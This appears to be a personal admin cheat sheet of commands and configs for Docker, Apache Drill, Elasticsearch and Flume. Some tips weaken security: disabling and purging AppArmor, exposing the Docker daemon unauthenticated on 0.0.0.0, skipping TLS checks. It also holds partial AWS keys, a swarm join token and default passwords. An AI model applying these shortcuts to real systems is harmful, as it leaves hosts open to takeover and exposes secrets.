  • as a starting point ( FROM ) use -alpine or scratch images, for example: "FROM python:3.6.1-alpine"
  • Each line in a Dockerfile creates a new layer, and because of the layer cache, the lines that change more frequently, for example, adding source code to an image, should be listed near the bottom of the file.
  • CMD will be executed after COPY
  • microdnf - minimal package manager
FROM python:3.6.1-alpine
RUN pip install flask
CMD ["python","app.py"]
COPY app.py /app.py
  • create user and group, create group
RUN groupadd -g 2053 r-d-ubs-technical-user
RUN useradd -ms /bin/bash -m -u 2056 -g 2053 customer2description
# activate user
USER customer2description
  • to download external artifacts you need to use the ADD command, COPY vs ADD
# download file
ADD http://artifactory.com/sourcefile.txt  /destination/path/sourcefile.txt
# download and extract archive
ADD https://artifactory.com/source.file.tar.gz /temp

read labels from container, read container labels, LABEL commands from container

docker inspect  --format '{{ .Config.Labels }}' cc-artifactory.ubsroup.net/docker/ros-automation:latest

communication with dockerd via REST & Python & CLI

docker sdk rest api

docker_api_version=1.41
# get list of containers
curl --unix-socket /var/run/docker.sock http://localhost/v${docker_api_version}/containers/json
# start container by container id
docker_container_id=050db1833a9c
curl --unix-socket /var/run/docker.sock -X POST http://localhost/v${docker_api_version}/containers/${docker_container_id}/start
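
a few more endpoints of the same Engine API ( sketch, same API version as above )

# list local images
curl --unix-socket /var/run/docker.sock http://localhost/v${docker_api_version}/images/json
# inspect a container
curl --unix-socket /var/run/docker.sock http://localhost/v${docker_api_version}/containers/${docker_container_id}/json
# stop a container
curl --unix-socket /var/run/docker.sock -X POST http://localhost/v${docker_api_version}/containers/${docker_container_id}/stop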

Examples

simple start

docker run -it ubuntu /bin/sh
docker exec -it high_mclean /bin/bash

docker with env variables

docker run --env http_proxy=$http_proxy --env https_proxy=$https_proxy --env no_proxy=$no_proxy -it ubuntu:18.04 /bin/bash

docker with local network

docker run -v /tmp:/home/root/tmp --net docker.local.network --ip 172.18.0.100 --hostname hadoop-local --network-alias hadoop-docker -t -i  -p  50075:50075/tcp  -p 50090:50090/tcp sequenceiq/hadoop-docker /etc/bootstrap.sh -bash

docker with extension rights

docker run --hostname=quickstart.cloudera --privileged=true -t -i -p 7180 4239cd2958c6 /usr/bin/docker-quickstart

MariaDB

MariaDB start in container

docker run --detach --env MYSQL_ROOT_PASSWORD=root --env MYSQL_USER=root --env MYSQL_PASSWORD=root --env MYSQL_DATABASE=technik_db --name golang_mysql --publish 3306:3306 mysql;

docker run --name mysql-container --volume /my/local/folder/with/data:/var/lib/mysql --volume /my/local/folder/with/init/scripts:/docker-entrypoint-initdb.d --publish 3306:3306 --env MYSQL_DATABASE=activitidb --env MYSQL_ROOT_PASSWORD=root --detach mariadb --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci

MariaDB sql dump creation:

docker exec mysql-container sh -c 'exec mysqldump --all-databases -uroot -p"$MYSQL_ROOT_PASSWORD"' > /some/path/on/your/host/all-databases.sql

MariaDB sql dump import

docker run --net=host -v /some/path/on/your/host:/sql -it arey/mysql-client --host=10.143.242.65 --port=3310 --user=root --password=example --database=files -e "source /sql/all-databases.sql"

docker compose

chmod +x docker-compose-Linux-x86_64
sudo mv docker-compose-Linux-x86_64 /usr/local/bin/docker-compose
sudo apt-get install  --only-upgrade docker

check installation from python

import docker
import compose

variables in compose file

  phpmyadmin:
    image: phpmyadmin/phpmyadmin
    # name of container for compose
    container_name: app_admin
    ports:
      - "8081:80"
    environment:
      - PMA_HOST=mysql
      - PMA_PORT=${MYSQL_PORT}
      - PMA_USER=${MYSQL_USER}
      - PMA_PASSWORD=${MYSQL_PASSWORD}
    depends_on: 
      - mariadb

and file .env in the same folder

MYSQL_USER=joomla
MYSQL_PASSWORD=joomla
MYSQL_PORT=3306
docker-compose config

dependencies inheritance

version: '3'


x-airflow-common:
  &airflow-common
  build:
    context: .
    dockerfile: .docker/airflow-init.Dockerfile
  env_file:
      - .docker/.env
  volumes:
    - ./airflow-dag/wondersign_airflow_shopify/dags:/opt/airflow/dags
    - ./logs:/opt/airflow/logs
  depends_on:
    redis:
      condition: service_healthy
    db_variant:
      condition: service_healthy


services:

  airflow-webserver:
    <<: *airflow-common
    command: webserver
    ports:
      - 8080:8080
    healthcheck:
      test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
      interval: 10s
      timeout: 10s
      retries: 5
    restart: always	

remove entry point

entrypoint:
    - php
    - -d
    - zend_extension=/usr/local/lib/php/xdebug.so
    - -d
    - memory_limit=-1
    - vendor/bin/phpunit

check memory limits inside container

# outside
docker stats <container_name>
# inside
cat /sys/fs/cgroup/memory/memory.limit_in_bytes
cat /sys/fs/cgroup/memory/memory.max_usage_in_bytes

start in detached mode, up and detach

docker-compose up -d

start with re-creating all containers

docker-compose up --force-recreate
# start without re-creation
docker-compose up --no-recreate

start compose with additional variables

docker-compose -f docker-compose.yaml build --force-rm --build-arg MY_LOCAL_VAR

start compose with multiply files

docker-compose -f docker-file1.yaml -f docker-file2.yaml -f docker-file3.yaml up

docker-compose find folder with image

by default the image name is prefixed with the name of the folder containing the docker-compose file ( underscore and minus signs may be stripped )
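
the prefix can be set explicitly

docker-compose --project-name myproject up -d
# or via environment variable
COMPOSE_PROJECT_NAME=myproject docker-compose up -d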

Issues

In file './docker-compose.yml' service 'version' doesn't have any configuration options.

solution:

  • check format of the docker-compose file
  • install a docker-compose version that matches your Docker version

ERROR: error while removing network: dockerairflow_default
docker ps
# dockerairflow_webserver_1 
# dockerairflow_postgres_1 

docker network disconnect --force dockerairflow_default dockerairflow_webserver_1 
docker network disconnect --force dockerairflow_default dockerairflow_postgres_1 
# docker network rm --force dockerairflow_default

sudo aa-status
sudo systemctl disable apparmor.service --now
sudo aa-status
sudo apt-get purge --auto-remove apparmor
sudo service docker restart
docker system prune --all --volumes

Docker hack docker change files docker volumes location manual volume edit

docker volume inspect
# ls /var/lib/docker/volumes/4a6b2fa5a102985d377e545d6cb8648ed4f80da2ae835a1412eb02b9e0c03a52/_data
docker image inspect puckel/docker-airflow:1.10.9
# find "UpperDir", "LowerDir"
# ls /var/lib/docker/overlay2/97d76c31dd4907544b7357c3904853f9ceb3c755a5dedd933fee44491d9ec900/diff
vim /var/lib/docker/overlay2/97d76c31dd4907544b7357c3904853f9ceb3c755a5dedd933fee44491d9ec900/diff/usr/local/airflow/airflow.cfg

Docker swarm

gossip protocol swarm overview

init 'manager' node

docker swarm init --advertise-addr eth0

you will see invitation to add 'worker' node like

docker swarm join --token SWMTKN-1-3p93jlhx2hx9wif8xphl6e47c5ukwz12a00na81g7h0uopk6he-6xof1chqhjuor7hkn65ggjw1p 192.168.0.18:2377

to show token again

docker swarm join-token worker
docker swarm join-token manager

amount of managers:

  • Three manager nodes tolerate one node failure.
  • Five manager nodes tolerate two node failures.
  • Seven manager nodes tolerate three node failures.
  • Amount of worker nodes: hundreds, even thousands.
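
node roles can be changed later ( node name below is illustrative )

docker node promote worker-1
docker node demote worker-1
# drain a node before maintenance
docker node update --availability drain worker-1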

to leave docker cluster

docker swarm leave

to print amount of nodes into cluster

docker node ls
docker node inspect {node name}

create service ( for manager only )

docker service create --detach=true --name nginx1 --publish 80:80  --mount source=/etc/hostname,target=/usr/share/nginx/html/index.html,type=bind,ro nginx:1.12
  • request to each node will be routed to routing mesh
  • each docker container on each node will have own mount point ( you should see name of different hosts from previous example )

inspect services

docker service ls

inspect service

docker service ps {service name}

update service, change service attributes

docker service update --replicas=5 --detach=true {service name}
docker service update --image nginx:1.13 --detach=true nginx1
  • store desire state into internal storage
  • swarm recognized diff between desired and current state
  • tasks will be executed according diff

service log

log will be aggregated into one place and can be shown

docker service logs {service name}

docker pause

docker pause {container name}
docker unpause {container name}

routing mesh effect

The routing mesh built into Docker Swarm means that any port that is published at the service level will be exposed on every node in the swarm. Requests to a published service port will be automatically routed to a container of the service that is running in the swarm.
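
for example, with the service from above published on port 80, every node answers ( node addresses are illustrative )

curl -s http://192.168.0.18/
curl -s http://192.168.0.19/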

docker daemon

## start docker daemon process
sudo dockerd 
# start in debug mode
sudo dockerd -D 
# start in listening mode
sudo dockerd -H 0.0.0.0:5555 

# using client with connection to remove docker daemon
docker -H 127.0.0.1:5555 ps
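
the same can be done via an environment variable

export DOCKER_HOST=tcp://127.0.0.1:5555
docker ps
unset DOCKER_HOST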

issues

docker image contain your local proxy credentials, remove credentials from docker container

container that you built locally contains your proxy credentials

# execution inside container
docker exec -it {container name} /bin/sh
env
# showing your credentials

solution

  • remove your credentials from file ~/.docker/config.json
{
  "proxies": {
    "default": { "httpProxy": "your value" }
  }
}
  • build container with "--build-arg"
docker build \
--tag $BUILD_IMAGE_NAME  \
--build-arg http_proxy=$http_proxy \
--build-arg https_proxy=$https_proxy \
--build-arg no_proxy=$no_proxy \
.

docker login

Error response from daemon: Get https://docker-registry-default.dplapps.adv.org/v2/: x509: certificate signed by unknown authority
  • solution1 - skip authentication change file ~/.docker/config.json
...
	"auths": {
		"docker-registry-default.dplapps.adv.org": {},
		"https://docker-registry-default.dplapps.adv.org": {}
	},
...
  • solution2 - authentication
url_to_registry="docker-registry-default.simapps.advant.org"
sudo mkdir -p "/etc/docker/certs.d/$url_to_registry"
sudo cp certificate.crt /etc/docker/certs.d/$url_to_registry

docker login -u login_user -p `oc whoami -t` $url_to_registry

docker push, docker pull

authentication required

solution before 'docker login' need change file ~/.docker/config.json remove next block

    "credsStore": "secretservice"

docker instance issue

#apt install software-properties-common
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package software-properties-common

solution need to execute 'update' before new package installation

apt update

and also helpful

apt install -y software-properties-common

docker build command issue

issue

FROM cc.ubsgroup.net/docker/builder
RUN mkdir /workspace
COPY dist/scenario_service.pex /workspace/scenario_service.pex
WORKDIR /workspace
docker build -t local-scenario --file Dockerfile-scenario-file .
# COPY/ADD failed: stat /var/lib/docker/tmp/docker-builder905175157/scenario_service.pex: no such file or directory

but file exists and present in proper place

solution 1 check your .dockerignore file for ignoring your "dist" or even worse "*" files :

# ignore all files
*

solution 2

FROM cc.ubsgroup.net/docker/builder
RUN mkdir /workspace
COPY scenario_service.pex /workspace/scenario_service.pex
WORKDIR /workspace
FULL_PATH="/home/projects/adp"
DOCKER_FILE="Dockerfile-scenario"
BUILD_SUBFOLDER="dist"
IMAGE_NAME="local-scenario"
docker build -t $IMAGE_NAME --file $FULL_PATH/$DOCKER_FILE $FULL_PATH/$BUILD_SUBFOLDER

docker remove volume issue

Error response from daemon: remove typo3_db_data: volume is in use 
docker system prune -af --volumes
docker volume rm typo3_db_data
sudo apt install podman

Drill cheat sheet

official doc

Architecture

components, phases

Components

  • Drill client ( connects to a Foreman, submits SQL statements, and receives results )
  • Foreman ( DrillBit server selected to maintain your session )
  • worker Drillbit servers ( do the actual work of running your query )
  • ZooKeeper server ( coordinates the Drillbits within the Drill cluster and keeps the configuration )

ZooKeeper is necessary for registering all Drillbit servers

LifeCycle

  1. Parse the SQL statement into an internal parse tree ( Apache Calcite )

check sql query

  2. Perform semantic analysis on the parse tree by resolving names against the schema ( set of tables ) in the selected database ( Apache Calcite )

check "database/table" names ( not columns, not column types - schema-on-read system !!! )

  3. Convert the SQL parse tree into a logical plan, which can be thought of as a block diagram of the major operations needed to perform the given query ( Apache Calcite )
  4. Convert the logical plan into a physical plan by performing a cost-based optimization step that looks for the most efficient way to execute the logical plan

Drill Web Console -> QueryProfile

  5. Convert the physical plan into an execution plan by determining how to distribute work across the available worker Drillbits
  6. Distribution

Major fragment - a set of operators that can be executed without exchange between DrillBits, grouped into a thread
Minor fragment - a slice of a Major fragment ( for instance reading one file from a folder ), the unit of distribution
Data affinity - place a minor fragment on the same node where the data resides ( HDFS/MapR; where compute and storage are separate, like cloud, placement is random )

  7. Collect all results ( Minor fragments ) on the Foreman and provide them to the client

start embedded

# install drill 
## https://drill.apache.org/download/
mkdir /home/projects/drill
cd /home/projects/drill
curl -L 'https://www.apache.org/dyn/closer.lua?filename=drill/drill-1.19.0/apache-drill-1.19.0.tar.gz&action=download' | tar -vxzf -

or

sudo apt-get install default-jdk
curl -o apache-drill-1.6.0.tar.gz http://apache.mesi.com.ar/drill/drill-1.6.0/apache-drill-1.6.0.tar.gz
tar xvfz apache-drill-1.6.0.tar.gz
cd apache-drill-1.6.0
# start drill locally
cd /home/projects/drill
# apache-drill-1.19.0/bin/sqlline -u jdbc:drill:zk=local
./apache-drill-1.19.0/bin/drill-embedded

# x-www-browser http://localhost:8047 &

start docker

docker run -it --name drill-1.19.0 -p 8047:8047 -p 31010:31010 -v /home/projects/temp/drill/conf:/opt/drill/conf  -v /home/projects/tempdiff-ko:/host_folder  apache/drill:1.19.0 
# docker stop drill-1.19.0
# docker ps -a | awk '{print $1}' | xargs docker rm {}
x-www-browser http://localhost:8047
x-www-browser http://localhost:8047/storage/dfs

## connect to drill cli
/opt/drill/bin/drill-embedded -u "jdbc:drill:drillbit=127.0.0.1"
# !help
# SELECT version FROM sys.version;

## logs
docker logs drill-1.19.0

cd /opt/drill/conf
cd /opt/drill/bin

configuration before start

(skip for embedded ) create /home/projects/temp/drill-override.conf

drill.exec: {
  cluster-id: "drillbits1",
  zk.connect: "localhost:2181"
}

local filesystem dfs

  "type": "file",
  "connection": "file:///",
  "workspaces": {
    "json_files": {
      "location": "/host_folder",
      "writable": false,
      "defaultInputFormat": "json",
      "allowAccessOutsideWorkspace": false
    },
    "tmp": {
      "location": "/tmp",
      "writable": true,
      "defaultInputFormat": null,
      "allowAccessOutsideWorkspace": false
    },
    "root": {
      "location": "/",
      "writable": false,
      "defaultInputFormat": null,
      "allowAccessOutsideWorkspace": false
    }
  },

Error text: Current default schema: No default schema selected

check your folder for existence ( maybe you haven't mapped in your docker container )

SHOW SCHEMAS;
SELECT * FROM sys.boot;
use dfs;

configuration in file: storage-plugins-override.conf

# This file involves storage plugins configs, which can be updated on the Drill start-up.
# This file is in HOCON format, see https://github.com/typesafehub/config/blob/master/HOCON.md for more information.
"storage": {
  dfs: {
    type: "file",
    connection: "file:///",
    workspaces: {
	    "wondersign": {
	      "location": "/home/projects/wondersign",
	      "writable": false,
	      "defaultInputFormat": "json",
	      "allowAccessOutsideWorkspace": false
   	 },    
    },
    formats: {
      "parquet": {
        "type": "parquet"
      },
      "json": {
      	"type": "json"
	extensions: [""],
      }
    },
    enabled: true
  }
}

s3 storage create storage: Storage->S3->Update

{
  "type": "file",
  "connection": "s3a://wond.../",
  "config": {
    "fs.s3a.secret.key": "nqGApjHh...",
    "fs.s3a.access.key": "AKIA6LW...",
    "fs.s3a.endpoint": "s3.us-east-1.amazonaws.com",
    "fs.s3a.impl.disable.cache":"true"
  },
<property>
    <name>fs.s3a.endpoint</name>
    <value>s3.REGION.amazonaws.com</value>
</property>
SELECT filepath, filename, sku FROM dfs.json_files.`/*` where sku is not null;

docs: http://drill.apache.org/docs/s3-storage-plugin/

vim apache-drill-1.19.0/conf/core-site.xml

<configuration>
       <property>
           <name>fs.s3a.access.key</name>
           <value>AKIA6L...</value>
       </property>
       <property>
           <name>fs.s3a.secret.key</name>
           <value>nqGApjHh....</value>
       </property>
       <property>
           <name>fs.s3a.endpoint</name>
           <value>us-east-1</value>
       </property>
       <property>
           <name>fs.s3a.endpoint</name>
           <value>s3.REGION.amazonaws.com</value>
       </property>  
</configuration>  

configuration after start

plugin configuration: https://drill.apache.org/docs/s3-storage-plugin/

s3 configuration: Storage->S3->Update

http://localhost:8047/storage > s3 > Update (check below) > Enable

  "connection": "s3a://bucket_name",
  "config": {
    "fs.s3a.secret.key": "nqGApjHh2i...",
    "fs.s3a.access.key": "AKIA6LWYA...",
    "fs.s3a.endpoint": "us-east-1"
  },

should appear in "Enabled Storage Plugins"

filesystem configuration dfs configuration

workspaces-> root -> location
> enter full path to filesystem

connect to existing on MapR

# login
maprlogin password
echo $CLUSTER_PASSWORD | maprlogin password -user $CLUSTER_USER
export MAPR_TICKETFILE_LOCATION=$(maprlogin print | grep "keyfile" | awk '{print $3}')

# open drill
/opt/mapr/drill/drill-1.14.0/bin/sqlline -u "jdbc:drill:drillbit=ubs000103.vantagedp.com:31010;auth=MAPRSASL"

drill shell

# start recording console to file, write output
!record out.txt
# stop recording
record

drill querying data

-- execute it first
show databases; -- show schemas;
--------------------------------------------
select sessionId, isReprocessable from dfs.`/mapr/dp.prod.zurich/vantage/data/store/processed/0171eabfceff/reprocessable/part-00000-63dbcc0d1bed-c000.snappy.parquet`;
-- or even 
select sessionId, isReprocessable from dfs.`/mapr/dp.prod.zurich/vantage/data/store/processed/*/*/part-00000-63dbcc0d1bed-c000.snappy.parquet`;
-- with functions
to_char(to_timestamp(my_column), 'yyyy-MM-dd HH:mm:ss')
to_number(concat('0', mycolumn),'#')

-- local filesystem
SELECT filepath, filename, sku FROM dfs.`/home/projects/dataset/kaggle-data-01` where sku is not null;
SELECT filepath, filename, sku FROM dfs.root.`/kaggle-data-01` where sku is not null

SELECT filepath, filename, t.version, t.car_info.boardnet_version catinfo FROM dfs.root.`/file_infos` t;
SELECT t.row_data.start_time start_time, t.row_data.end_time end_time FROM ( SELECT flatten(file_info) AS row_data from dfs.root.`/file_infos/765f3c13-6c57-4400-acee-0177ca43610b/Metadata/file_info.json` ) AS t;

-- local file system complex query with inner!!! join
SELECT hvl.startTime, hvl.endTime, hvl.labelValueDouble, hvl2.labelValueDouble 
FROM dfs.`/vantage/data/store/95933/acfb-01747cefa4a9/single_labels/host_vehicle_latitude` hvl INNER JOIN dfs.`/vantage/data/store/95933/acfb-01747cefa4a9/single_labels/host_vehicle_longitude` hvl2
ON hvl.startTime = hvl2.startTime
WHERE hvl.startTime >= 1599823156000000000 AND hvl.startTime <= 1599824357080000000

!!! important: you should avoid the colon ':' symbol in the path ( explicitly or implicitly via an asterisk )

drill http

# check status
curl --insecure -X GET https://mapr-web.vantage.zur:21103/status

# obtain cookie from server
curl -H "Content-Type: application/x-www-form-urlencoded" \
  -k -c cookies.txt -s \
  -d "j_username=$DRILL_USER" \
  --data-urlencode "j_password=$DRILL_PASS" \
  https://mapr-web.vantage.zur:21103/j_security_check

# obtain version
curl -k -b cookies.txt -X POST \
-H "Content-Type: application/json" \
-w "response-code: %{http_code}\n" \
-d '{"queryType":"SQL", "query": "select * from sys.version"}' \
https://mapr-web.vantage.zur:21103/query.json


# SQL request
curl -k -b cookies.txt -X POST \
-H "Content-Type: application/json" \
-w "response-code: %{http_code}\n" \
-d '{"queryType":"SQL", "query":  "select loggerTimestamp, key, `value` from dfs.`/mapr/dp.zurich/some-file-on-cluster` limit 10"}' \
https://mapr-web.vantage.zur:21103/query.json

drill cli

!set outputformat 'csv'
!record '/user/user01/query_output.csv'
show databases
!record

drill java

src code

/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.222/jre/bin/java \
-Ddrill.customAuthFactories=org.apache.drill.exec.rpc.security.maprsasl.MapRSaslFactory \
-Djava.security.auth.login.config=/opt/mapr/conf/mapr.login.conf \
-Dzookeeper.sasl.client=false \
-Dlog.path=/opt/mapr/drill/drill-1.14.0/logs/sqlline.log \
-Dlog.query.path=/opt/mapr/drill/drill-1.14.0/logs/sqlline_queries/data_api-s_sqlline_queries.json \
-cp /opt/mapr/drill/drill-1.14.0/conf:/opt/mapr/drill/drill-1.14.0/jars/*:/opt/mapr/drill/drill-1.14.0/jars/ext/*:/opt/mapr/drill/drill-1.14.0/jars/3rdparty/*:/opt/mapr/drill/drill-1.14.0/jars/classb/*:/opt/mapr/drill/drill-1.14.0/jars/3rdparty/linux/*:drill_jdbc-1.0-SNAPSHOT.jar \
DrillCollaboration

drill errors

Caused by: java.lang.IllegalStateException: No active Drillbit endpoint found from ZooKeeper. Check connection parameters?
[MapR][DrillJDBCDriver](500150) Error setting/closing connection:
# check your Zookeeper host & cluster ID
ZOOKEEPER_HOST=zurpmtjp03.ddp.com:5181,zurpmtjp04.ddp.com:5181
DRILL_CLUSTER_ID=dp_staging_zur-drillbits
/opt/mapr/drill/drill-1.16.0/bin/sqlline -u "jdbc:drill:zk=${ZOOKEEPER_HOST}/drill/${DRILL_CLUSTER_ID};auth=MAPRSASL"

drill special commands

increasing amount of parallel processing threads

set planner.width.max_per_node=10;

show errors in log

ALTER SESSION SET `exec.errors.verbose`=true;

sql examples

select columns[0], columns[1] from s3.`sample.csv`

Elasticsearch cheat sheet

rest api documentation
examples
examples

installation

curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update && sudo apt install elasticsearch
sudo systemctl start elasticsearch
curl -X GET 'http://localhost:9200'

collaboration

# common part
ELASTIC_HOST=https://elasticsearch-label-search-prod.apps.vantage.org
INDEX_NAME=ubs-single-autolabel

check connection

# version info
curl -X GET $ELASTIC_HOST

# health check
curl -H "Authorization: Bearer $TOKEN" -X GET $ELASTIC_HOST/_cluster/health?pretty=true
curl -X GET $ELASTIC_HOST/_cluster/health?pretty=true
curl -X GET "$ELASTIC_HOST/_cluster/health?pretty=true&level=shards"
curl -X GET $ELASTIC_HOST/$INDEX_NAME

check user

curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/_security/user/_privileges
curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/_security/user
curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/_security/user/$USER_ELASTIC

obtain bearer token

curl -s --user "$USER_ELASTIC:$USER_ELASTIC_PASSWORD" -X GET $ELASTIC_HOST/token

index

create index
mapping
Info: if your index or id has space ( special symbol ) you should replace it with %20 ( http escape )

index info

# all indexes
curl -X GET $ELASTIC_HOST/_cat/indices | grep ubs | grep label
# count records by index
curl -X GET $ELASTIC_HOST/_cat/count/$INDEX_NAME
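
count via the dedicated _count endpoint

curl -X GET "$ELASTIC_HOST/$INDEX_NAME/_count?pretty"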

create index from file

curl -X POST $ELASTIC_HOST/$INDEX_NAME/_mapping \
-H 'Content-Type: application/json' \
-d @labels_mappings.json

create index inline

# get index
curl -s --user "$SEARCH_USER:$SEARCH_PASSWORD" -X GET $ELASTIC_HOST/$ELASTIC_INDEX > file_with_index.json

# for using just have read index, pls remove next lines:
# {"index_name": {"aliases": {}, "mappings": {  # and last } 
# settings.index.provided_name
# settings.index.creation_date
# settings.index.uuid
# settings.index.version

# create index
json_mappings=`cat file_with_index.json`
curl -X PUT $ELASTIC_HOST/$INDEX_NAME -H 'Content-Type: application/json' \
-d @- << EOF
{
	"mappings": $json_mappings,
	"settings" : {
        "index" : {
            "number_of_shards" : 1,
            "number_of_replicas" : 0
        }
    }
}
EOF

Index creation Dynamic type creation

curl --insecure -s --user "$ELK_USER:$ELK_PASSWORD" -X PUT $ELASTIC_HOST/$INDEX_NAME -H 'Content-Type: application/json' --data @- << EOF
{
    "settings": {
        "index": {
            "number_of_shards": "3",
                "auto_expand_replicas": "false",
                "number_of_replicas": "2"
            }
        }
}
EOF

curl --insecure -s --user ${ELK_USER}:${ELK_PASSWORD} -X PUT ${ELASTIC_HOST}/${ELASTIC_INDEX}/_mapping/${DYNAMIC_TYPE_NAME}?include_type_name=true -H 'Content-Type: application/json' -d @- << EOF
{
    "label": {
        "properties": {
            "controlDate": {
                "type": "date"
            },
            "roadType": {
                "type": "keyword"
            },
            "nameOfProject": {
                "type": "keyword"
            }
        }
    }
}
EOF

update index

curl -X PUT -s --user "$SEARCH_USER:$SEARCH_PASSWORD" $ELASTIC_HOST/$ELASTIC_INDEX/_mapping
{
	"_source": {
                              "excludes": [
                                            "id"
                              ]
               },
               "properties": {
                              "mytags": {
                                            "type": "flattened"
                              }
               }
}

delete index

# backup the index definition first
curl -s --user "$SEARCH_USER:$SEARCH_PASSWORD" -X GET $ELASTIC_HOST/$ELASTIC_INDEX > file_with_index.json
# delete the index
curl -s --user "$SEARCH_USER:$SEARCH_PASSWORD" -X DELETE $ELASTIC_HOST/$ELASTIC_INDEX

or it is better without types specification:

{
        "settings": {
            "index": {
                "number_of_shards": "5",
                "auto_expand_replicas": "false",
                "number_of_replicas": "2"
            }
        }
}
# query search in the whole instance 
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/_search?q=sessionId:$SESSION_ID&pretty"
# query search in index 
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_search?q=sessionId:0f0062a6-e45b-4c5b-b80c-099db65edd20&pretty"
# query select first records from index
curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_search?pretty" -d @- <<EOF
{
  "size": 1,
  "query": {
    "match_all": {}
  }
}
EOF
 
# get by id
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/_doc/$DOC_ID

PROPERTY_XPATH=ship.distance
# inline query to ELK 
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_search?q=sessionId:${SESSION_ID}&size=10000&pretty"
curl -X GET -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_search?q=$PROPERTY_XPATH:>100&pretty=true"

# query from external file
echo '{"query": {"match" : {"sessionId" : "a8b8-0174df8a3b3d"}}}' > request.json
echo '{"query": { "range" : {"ship.distance": {"gte": 100}}}}' > request.json
curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD -d @request.json "$ELASTIC_HOST/$ELASTIC_INDEX/_search"

# elastic complex query
curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$INDEX_NAME/_search" \
-d @- << EOF
{ "size":"10000",
  "query": {"bool": { "must": [ {"match": { "property1":"5504806" } } ] } },
  "_source":{"includes":["property1","property2","property3"],"excludes":["property4","property5"]}, 
  "sort": [
        { "property1": { "order": "desc", "unmapped_type":"long" }},
        { "property2": { "order": "desc", "unmapped_type":"keyword" }},
        { "property3": { "order": "desc", "unmapped_type":"long" }}
    ]}
EOF

insert record

curl -X POST -H 'Content-Type: application/json' --data @test-example.json  -u $ELASTIC_USER:$ELASTIC_PASSWORD $ELASTIC_HOST/$ELASTIC_INDEX/label

update record

curl -X POST -H "Content-Type: application/json" -u $ELASTIC_USER:$ELASTIC_PASSWORD "$ELASTIC_HOST/$ELASTIC_INDEX/_update/${DOC_ID}" -d @- <<EOF
{
  "doc": {
    "property_1": [
      "true"
    ]
  }
}
EOF

remove records delete records

curl -X POST $ELASTIC_HOST/$INDEX_NAME/_delete_by_query -H 'Content-Type: application/json' \
-d @- << EOF
{
    "query": {
        "term": {
            "sessionId.keyword": {
                "value": "8a140c23-420c-3bf0a285",
                "boost": 1.0
            }
        }
    }
}
EOF

remove all records from index

curl -X POST --insecure -s --user $USER:$PASSWORD $ELASTIC_HOST/$INDEX_NAME/_delete_by_query  -H 'Content-Type: application/json' -d '{
    "query": { "match_all": {} }
}'

curl -X POST --insecure -s --user $USER:$PASSWORD $ELASTIC_HOST/$INDEX_NAME/_delete_by_query -H 'Content-Type: application/json' -d @- << EOF
{
    "query": {
        "match": {
            "_id": "_all"
        }
    }
}
EOF

backup snapshot save load index
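
a minimal sketch using the standard _snapshot API ( assumes the repository location is whitelisted via path.repo in elasticsearch.yml )

# register a filesystem repository
curl -X PUT "$ELASTIC_HOST/_snapshot/my_backup" -H 'Content-Type: application/json' \
  -d '{"type": "fs", "settings": {"location": "/mount/backups"}}'
# take a snapshot of one index
curl -X PUT "$ELASTIC_HOST/_snapshot/my_backup/snapshot_1?wait_for_completion=true" -H 'Content-Type: application/json' \
  -d '{"indices": "'$INDEX_NAME'"}'
# restore it later
curl -X POST "$ELASTIC_HOST/_snapshot/my_backup/snapshot_1/_restore" -H 'Content-Type: application/json' \
  -d '{"indices": "'$INDEX_NAME'"}'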

Exceptions

org.elasticsearch.hadoop.rest.EsHadoopRemoteException: illegal_argument_exception: Can't merge because of conflicts: [Cannot update excludes setting for [_source]]

check your index & type - something wrong with creation

Flume cheat sheet

Architecture

documentation

the architecture consists of three tiers:

  • Agent tier - has a Flume agent installed; the agent sends data to the Collector tier
  • Collector tier - aggregates the data and pushes it to the Storage tier
  • Storage tier

Each tier has

  • Source
  • Sink
  • Channel between them

Source and Sink used Avro ( Remote procedure call and serialization framework )

Interceptors can be configured for simple data processing


example of the configuration

#
# bin/flume-ng agent -name agent_1 -c conf -f conf/flume-conf-file-log.properties -Dflume.root.logger=INFO,console
#

# aliases for layers
agent_1.sources = folderSource
agent_1.channels = memoryChannel
agent_1.sinks = loggerSink


# layers description
agent_1.sources.folderSource.type = spooldir
agent_1.sources.folderSource.poolDelay = 500 
agent_1.sources.folderSource.spoolDir = /home/technik/temp/flume-example/source
agent_1.sources.folderSource.fileHeader = true
agent_1.sources.folderSource.batchSize=50
agent_1.sources.folderSource.channels = memoryChannel
#          ^   ^
#         |     |
#        |       |
#       | channel |
#        |       |
#         |     |
#          V   V
agent_1.sinks.loggerSink.channel = memoryChannel
agent_1.sinks.loggerSink.type = logger
agent_1.sinks.loggerSink.batch-size=50

# description of channel between Source and Sink
agent_1.channels.memoryChannel.type = memory
agent_1.channels.memoryChannel.capacity = 100



# ---------------------------------------------
# aliases for layers
agent_2.sources = pythonScriptExample
agent_2.channels = memoryChannel
agent_2.sinks = loggerSink

#import time
#if __name__=="__main__":
#	counter = 0
#	# for _ in range (10):
#	while True:
#		time.sleep(0.1)
#		print("next value is: "+str(counter))
#		counter = counter + 1

agent_2.sources.pythonScriptExample.type = exec
agent_2.sources.pythonScriptExample.batchSize = 1
